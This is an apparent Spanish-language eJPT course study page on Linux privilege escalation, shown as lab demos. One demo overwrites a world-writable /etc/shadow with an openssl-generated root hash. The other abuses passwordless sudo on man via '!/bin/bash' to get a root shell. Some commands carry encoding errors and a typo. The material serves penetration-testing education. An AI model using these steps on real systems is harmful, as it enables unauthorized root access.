eJPT
  • 馃憢Welcome
  • Tools
    • 馃敪Escaneo y Enumeraci贸n
  • SECTION 1: Assessment Methodologies
    • Assessment Methodologies: Information Gathering
      • Introducci贸n a la Recopilaci贸n de Informaci贸n
        • Start Quiz
      • Passive Information Gathering
      • Active Information Gathering
    • Assessment Methodologies: Footprinting & Scanning
      • Introduction
      • Networking Primer
      • Host Discovery
      • Port Scanning
      • Evasion, Scan Performance & Output
      • Page
      • Challenges
    • Assessment Methodologies: Enumeration
      • Overview
      • SMB Lesson
      • FTP Lesson
      • SSH Lesson
      • HTTP Lesson
      • SQL Lesson
    • Assessment Methodologies: Vulnerability Assessment
      • Vulnerability Assessment
      • Course Labs
  • SECTION 2: Host & Networking Auditing
    • Assessment Methodologies: Auditing Fundamentals
      • Assessment Methodologies
      • Practice
  • SECTION 3: Host & Network Penetration Testing
    • Host & Network Penetration Testing: System/Host Based Attacks
      • Introduction to Attacks
      • Windows Vulnerabilities
      • Exploiting Windows Vulnerabilities
      • Windows Privilege Escalation
      • Windows File System Vulnerabilities
      • Windows Credential Dumping
      • Linux Vulnerabilities
      • Exploiting Linux Vulnerabilities
      • Linux Privilege Escalation
      • Linux Credential Dumping
      • Conclusion
    • Host & Network Penetration Testing: Network-Based Attacks
      • Network-Based Attacks
    • Host & Network Penetration Testing: The Metasploit Framework (MSF)
      • Metasploit
        • Metasploit Fundamentals
      • Information Gathering & Enumeration
        • Nmap
        • Enumeration
      • Vulnerability Scanning
        • MSF
        • Nessus
        • Web Apps
      • Client-Side Attacks
        • Payloads
        • Automating
      • Exploitation
        • Windows Exploitation
        • Linux Exploitation
        • Post Exploitation Fundamentals
        • Windows Post Exploitation
        • Linux Post Exploitation
      • Armitage
        • Metasploit GUIs
    • Host & Network Penetration Testing: Exploitation
      • Introduction To Exploitation
      • Vulnerability Scanning Overview
      • Exploits
        • Searching For Exploits
        • Fixing Exploits
      • Shells
      • Frameworks
      • Windows
      • Linux
      • Obfuscation
    • Host & Network Penetration Testing: Post-Exploitation
      • Introduction
      • Windows Enumeration
      • Linux Enumeration
      • Transferring Files
      • Shells
      • Escalation
        • Windows Privilege Escalation
        • Linux Privilege Escalation
      • Persistence
        • Windows Persistence
        • Linux Persistence
      • Dumping & Cracking
        • Windows Password Hashes
        • Linux Password Hashes
      • Pivoting Lesson
      • Clearing
  • Host & Network Penetration Testing: Social Engineering
    • Social Engineering
  • SECTION 4: Web Application Penetration Testing
    • Introduction to the Web & HTTP Protocol
      • Web Applications
      • HTTP Protocol
        • HTTP/S Protocol Fundamentals
        • Website Crawling & Spidering
Powered by GitBook
On this page
  • Weak Permissions
  • Demo: Linux Privilege Escalation Weak Permissions
  • Quiz: Weak Permissions
  • SUDO Privileges
  • Demo: Linux Privilege Escalation - SUDO Privileges
  • Quiz: SUDO Privileges
  1. SECTION 3: Host & Network Penetration Testing
  2. Host & Network Penetration Testing: Post-Exploitation
  3. Escalation

Linux Privilege Escalation

PreviousWindows Privilege EscalationNextPersistence

Last updated 3 months ago

Weak Permissions

: LinEnum es un script bash simple que automatiza las verificaciones de enumeraci贸n locales comunes de Linux, ademas de identificar vulnerabilidades de escalada de privilegios.

Demo: Linux Privilege Escalation Weak Permissions

student@attackdefensew$ whoami
student
student@attackdefensew$ cat /etc/passwd
student@attackdefensew$ cat /etc/group
student@attackdefensew$ group student

# El objetivo es encontrar cualquier archivo que pueda ser modificado para 
# escalar privilegio
find / -not -type 1 -perm -o+w
# El archivo shadow almacena las contrase帽as
student@attackdefense:忙$ cat /etc/shadow
# Ver los permisos del archivo
student@attackdefense:忙$ ls -al /etc/shadow
-rw-rw-rw- 1 root shadow 523 Sep 23 2018 /etc/shadow
# modificamos la contrasena del root
student@attackdefense:N$ openssl passwd -1 -salt abc password
# Copiamos el valor en el usuario root en la contrasena
student@attackdefensew$ vim /etc/shadow
# Probamos la conexion 
student@attackdefensew$ su
root@attackdefense:/

Quiz: Weak Permissions

SUDO Privileges

Demo: Linux Privilege Escalation - SUDO Privileges

student@attackdefensew$ cat /etc/passwd

# Ver que comandos podemos ejecutar
student@attackdefense:~$ sudo -l
# El comando te puede indicar que comandos puedes ejecutar sin la contrasena de root
# pero que sea de propiedad de root

User student may run the following commands on attackdefense:
(root) NOPASSWD: /usr/bin/man


student@attackdefense:N$ sudo man ls
# Despues que se ejecute el comando puede ejecutar el siguiente comando
# debido a que cuando hace uso man, podemos utilizar una sesion bash con "!"
# Por lo cual cuando este leyendo el comando del contenido man puede usar
!/bin/bash

cd /root
ls
flag

Quiz: SUDO Privileges

LinEnum
GitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation ChecksGitHub
Logo